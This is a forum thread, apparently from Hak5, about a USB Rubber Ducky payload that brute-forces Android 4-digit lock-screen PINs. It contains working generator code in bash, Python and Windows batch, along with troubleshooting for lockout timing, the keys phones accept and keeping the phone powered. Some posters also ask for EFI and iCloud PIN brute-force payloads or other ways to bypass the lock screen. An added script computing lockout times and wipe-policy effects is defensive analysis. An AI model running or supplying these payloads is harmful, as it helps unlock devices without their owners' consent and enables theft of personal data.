Darren Kitchen

[Payload] Android Brute Force 4-digit pin

62 posts in this topic

I saw Darren's bash code (I'm not gonna lie, I was intimidated), but after running it, COOL!!! Now I just need to find a willing test subject (locked in for 2 yrs on my iPhone :unsure: )

0


Love the shows!

Question: Is this the only way to do this? I would think to connect the phone to a normal computer and run the needed scripts from there will do the same?

Question: What kind of software OS is running on the chip?

0


Q1: No, see above.

Q2: The chip is a micro-controller, not an actual full-blown OS; it's pre-programmed with a set of instructions triggered/executed by a series of interrupts.

0


Just playing around with the Android 4 digit pin code and a Samsung Galaxy S2.

I noticed the S2 (maybe it depends on the version) didn't respond to the ENTER key on an external keyboard while in "standby" mode. It will respond to the ESC key, so if you have this problem change the DELAY 5000\nENTER to DELAY 5000\nESC.

If you want to play around with the Rubber Ducky script, first give it a try with an external keyboard. Maybe your timeout settings are different, so you need to change the delay settings.

0


This could work incredibly well when "Quick unlock" is enabled in Android's security settings, anyone tried it out yet?

0


Been trying the Ducky with the payload script to brute force the 4-digit phone lock; it times out after 3,000 attempts of 10,000 ???

Any thoughts as to why it stops at 3,000 when the script is for 10,000?

Thanks in advance

0


Can someone please tell me how to insert the payloads in the USB Rubber Ducky, and does anyone have the payload for EFI PINs (4 digits)?

0


Can someone please tell me how to insert the payloads in the USB Rubber Ducky, and does anyone have the payload for EFI PINs (4 digits)?

I'm looking for the same. I have the code for Teensy 3, but I can't seem to get the payload to work correctly on the Rubber Ducky.

These links list the codes used for the Teensy 3 for EFI brute forcing and iCloud PIN brute forcing. Can someone PLEASE take a look at it and see if it needs to be edited to work on the Rubber Ducky?

http://orvtech.com/en/howto/atacar-efi-pin-macbook-pro/#UPDATE

http://orvtech.com/en/howto/ataque-fuerza-bruta-pin-icloud/

0


The adapter that will work for the iPhone is called the Apple Camera adapter. I have a few Apple devices, and it works for all of them. I have yet to try the iPhone 5 though, as this requires the new camera adapter. Now we just need to get the timing/code corrected, as the iPhone is a bit different than the Android.

Awesome Work!! Keep it up Darren!!

0


Part Number for iPhone up to 4S: MC531ZM

Part Number for iPhone 5: MD821ZM

0


To adapt Darren's simple script to generate android.txt on OSX, you need Mac Ports installed and you need to install gsed (gnu-sed), as gnu-sed is slightly different to OSX's default bsd-sed.

port install gsed
then:

echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | gsed '0~5 s/$/\nWAIT/g' | gsed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | gsed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt
Not sure what's going wrong with Cygwin?

How can I modify this script to put a delay between each keystroke? So basically: enter 0, delay 500 ms, enter 0, delay 500 ms, enter 0, delay 500 ms, enter 1, etc.

0


Hey all, I'm trying to execute this payload on my ASUS tablet and it doesn't respond to ENTER. As suggested I've tried ESC along with OK, SPACE, RETURN, SUBMIT and TAB... any suggestions would be appreciated!

0


Hi great Ducky payload!

This works great on my Android 4.4.2 Samsung, but is there any update or way through more recent Android versions? I have tested it on the HTC One M8 and the script begins to run and navigates to the PIN screen, but the keypad will only work from physical access to the phone and not by the Ducky or a USB keyboard.

Any advice or tips would be great

Jake

0


I'll be demoing this on next week's Hak5 episode but figured I'd post it here first and get some feedback. Thus far it works perfectly on a Galaxy Nexus running the latest Android 4.2.1. I've also tested it with a Galaxy Note 2 running 4.2.1 and it ran as expected.

20121205_125338.jpg

I'm very surprised that with the stock Android OS and recommended settings of setting a PIN code this was possible. I had expected the phone to reset or format after 100 attempts or something like that.

With a 4 digit PIN and the default of 5 tries followed by a 30 second timeout you're looking at a best case scenario of exhausting the key space in about 16.6 hours. Not bad all things considered. If you're the NSA or the Mafia that's totally reasonable, I'd say. Thankfully the USB Rubber Ducky never gets tired, bored or has to pee.

Rather than post the nearly 600K duckyscript I'll just post the bit of bash I used to create it. You could modify it to do 5 digit, but that would take 166 hours. 10 digit would take 1902.2 years. ;-)

echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt
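The "16.6 hours" figure above is pure lockout arithmetic: 10,000 PINs in windows of 5 attempts, 30 seconds of forced waiting after each window. The script below is an added example, not code from this thread or from Hak5. It reproduces that figure (and the 166-hour and roughly 1,900-year numbers for 5 and 10 digits), shows how far into the run a given PIN falls for the sequential sweep versus the "common PINs first" order used by the Python payload posted later in this thread, and shows how a wipe-after-N-failed-attempts policy caps the attacker at N guesses out of the whole keyspace. Policy values (tries per window, lockout length, wipe threshold) are constructed inputs, not settings read from any device.

```python
"""Lockout-policy arithmetic for the lock-screen PIN brute force discussed above.

Added example, not the thread's own code. All policy parameters are
constructed inputs, not values read from a device.
"""

SECONDS_PER_YEAR = 365 * 24 * 3600

# The twenty common PINs from the Python payload posted later in this thread.
COMMON_PINS = ['1234', '1111', '0000', '1212', '7777', '1004', '2000', '4444',
               '2222', '6969', '9999', '3333', '5555', '6666', '1122', '1313',
               '8888', '4321', '2001', '1010']


def seconds_to_exhaust(digits, tries_per_window=5, lockout_seconds=30,
                       per_try_seconds=0.0):
    """Time to enter every PIN of the given length once.

    Each completed window of tries_per_window attempts is followed by one
    lockout of lockout_seconds. per_try_seconds models the typing and UI
    delay per attempt; 0 reproduces the thread's lockout-only figure.
    """
    keyspace = 10 ** digits
    lockouts = keyspace // tries_per_window
    return lockouts * lockout_seconds + keyspace * per_try_seconds


def sequential_order(digits):
    """The 0000..9999 style sweep used by the generator scripts in the thread."""
    return [str(i).zfill(digits) for i in range(10 ** digits)]


def common_first_order(common, digits):
    """Guess order used by the Python payload: common PINs, then the full sweep."""
    return list(common) + sequential_order(digits)


def seconds_until_guessed(pin, order=None, tries_per_window=5,
                          lockout_seconds=30, per_try_seconds=0.0):
    """Elapsed time when `pin` is entered, or None if it is never tried.

    Lockouts suffered before 0-based attempt i are i // tries_per_window.
    """
    if order is None:
        order = sequential_order(len(pin))
    for index, guess in enumerate(order):
        if guess == pin:
            lockouts = index // tries_per_window
            return lockouts * lockout_seconds + (index + 1) * per_try_seconds
    return None


def success_probability_before_wipe(digits, max_failed_attempts):
    """Chance of finding a uniformly random PIN before a wipe-after-N policy
    fires: the attacker gets at most N guesses out of 10**digits."""
    return min(1.0, max_failed_attempts / 10 ** digits)


if __name__ == "__main__":
    for digits in (4, 5, 10):
        secs = seconds_to_exhaust(digits)
        print("%2d digits: %.1f hours (%.1f years)"
              % (digits, secs / 3600, secs / SECONDS_PER_YEAR))
    print("'1234' sequential: %d s" % seconds_until_guessed("1234"))
    print("'1234' common-first: %d s"
          % seconds_until_guessed("1234", common_first_order(COMMON_PINS, 4)))
    print("P(success) before wipe after 10 failures: %.4f"
          % success_probability_before_wipe(4, 10))
```

Two things fall out of the numbers: the lockout alone sets the runtime (a 1-second typing delay per attempt adds under three hours to the 4-digit case), so only a policy that ends the run, such as a wipe or an escalating lockout, changes the picture; and a PIN on the common list is entered within the first window regardless of how long the full sweep would take.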

Will this script work against Windows 10 PINs as it is?

0


If anyone is having problems with the bash script, I have written something similar in Python. I mostly use the Raspberry Pi to do all my encoding. This script will inject 20 of the most common pin codes first, and then brute force afterwards.

#!/usr/bin/python

# Twenty common 4-digit PINs, injected before the exhaustive sweep.
defaultList = ['1234', '1111', '0000', '1212', '7777', '1004', '2000', '4444', '2222', '6969', '9999', '3333', '5555', '6666', '1122', '1313', '8888', '4321', '2001', '1010']

def main():
    fileOpen = open("android_payload.txt", "w+")
    # Give the phone time to enumerate the keyboard before typing
    fileOpen.write("DELAY 5000\n")

    # Common PINs first
    for x in defaultList:
        fileOpen.write("STRING %s\n" % x)
        fileOpen.write("ENTER\nDELAY 500\n")

    # Then every PIN from 0000 to 9999, one digit per loop level
    for w in range(0, 10):
        for z in range(0, 10):
            for y in range(0, 10):
                for x in range(0, 10):
                    fileOpen.write("STRING %d%d%d%d\n" % (w, z, y, x))
                    # Extra ENTER on even-numbered PINs, as originally posted
                    if (x % 2) == 0:
                        fileOpen.write("ENTER\n")
                    fileOpen.write("ENTER\nDELAY 500\n")

    fileOpen.close()

main()

2


I am new to this program/script and the USB Ducky. We use Windows. I went to the online tool, USB Ducky Toolkit, to implement the code referenced above. Can someone help me recode it to work in the Ducky Toolkit? I would like to show this exercise on our training phones in class. Thank you.

0


What OS are you using? And is it the code from the first post?

The bash code from the first post cannot be directly imported into the online compiler. Although if you trust me as forum admin, all around good guy, etc :P I can compile the code and send you the .bin to use for your class.

0


"Although if you trust me as forum admin, all around good guy, etc :P I can compile the code and send you the .bin to use for your class"

I am using it on Samsung note phones with 4 digit pin set. It would be awesome to have you create the bin for me. I still would like to learn how to recreate the script in the toolkit if possible. My issue is the number creation I think. Thanks

0


I am running CYGWIN and am having some problems with the script. Can anyone see what is happening with the script? Here is my command line.

C:\Users\UserName\Desktop>echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt

C:\Users\UserName\Desktop>dir android*
 Volume in drive C has no label.
 Volume Serial Number is 2499-C7D7

 Directory of C:\Users\UserName\Desktop

07/07/2012  01:03 AM               165 Android Paths.txt
08/30/2012  08:00 PM                50 Android SDK Path.txt
12/09/2012  02:26 PM                63 android_brute-force_0000-9999.txt
               3 File(s)            278 bytes
               0 Dir(s)  831,818,436,608 bytes free

C:\Users\UserName\Desktop>type android_brute-force_0000-9999.txt
DELAY 5000 ; echo {0000..9999}
STRING
DELAY 1000
ENTER
ENTER

C:\Users\UserName\Desktop>

Instead of using a Linux terminal, I made a batch script for this; it does the same thing.

Here is the code:

@echo off
setlocal
set NUM=0
set COUNT=0

REM Header, then an ESC and a cleared PIN field before the first attempt
echo REM Author: Siem>>input.txt
echo REM Idea taken from: Darren Kitchen>>input.txt
echo REM Description: Bruteforcer>>input.txt
echo DELAY 1000>>input.txt
echo.>>input.txt
echo ESC>>input.txt
echo DELAY 500>>input.txt
echo STRING 0000>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo.>>input.txt

:START
cls
REM After every 5 attempts, insert the 30 second lockout wait
IF %COUNT% EQU 5 (set COUNT=0& call :WAIT)
REM Pad NUM with leading zeros to four digits
IF %NUM% LEQ 9 set ZERO=000
IF %NUM% GTR 9 set ZERO=00
IF %NUM% GTR 99 set ZERO=0
IF %NUM% GTR 999 set ZERO=
REM Stop once 9999 has been written (checking EQU 9999 before writing skipped it)
IF %NUM% GTR 9999 (pause & exit)
echo DELAY 500>>input.txt
echo STRING %ZERO%%NUM%>>input.txt
echo ENTER>>input.txt
echo %ZERO%%NUM%
set /a NUM=%NUM% + 1
set /a COUNT=%COUNT% + 1
goto START

:WAIT
echo.>>input.txt
echo REM Wait 30 seconds>>input.txt
echo DELAY 30000>>input.txt
echo ESC>>input.txt
echo DELAY 500>>input.txt
echo STRING 0000>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo.>>input.txt
goto :eof

You can change the delay a bit, I am still testing it, but this echoes 0000..9999 without using Linux.

~Siem

0


Hi,

I'm new to the forum and wondered if someone might be able to help me. I've been trying to get the Android brute force working for an awareness demo; however I'm not having much luck. I ran the bash script on the original post and created a new inject.bin but nothing happens when I insert it into the phone!

Any help would be gratefully received.

I have Samsung GT-S5830i Android version 2.3.6

Thanks

0


Anyone have any suggestions as to how to keep the phone powered when attempting a 5-digit PIN code? Doubt this phone will survive 160+ hours lol

I've tried using a Targus USB hub; however, I don't think the data from the Rubber Ducky can traverse through the hub into the micro USB OTG to USB Android adapter.. unless I'm doing something wrong, which I don't doubt lol

I guess an alternative is to break up the code into smaller chunks.. 00000-09999, 10000-19999, 20000-29999, and so on. would take forever lol 

any help would greatly be appreciated. cheers!

0


The phone may not support USB keyboard or the OTG cable you are using may not be working properly.

Try running the duck in a notepad on your computer to see that it is typing things correctly to eliminate that variable.

0


So I've run the Ducky script in Notepad and I don't believe the Galaxy Core Prime is compatible (doesn't accept a USB keyboard). Any other suggestions on running a brute force PIN hack, or maybe another method to bypass the PIN screen?

0
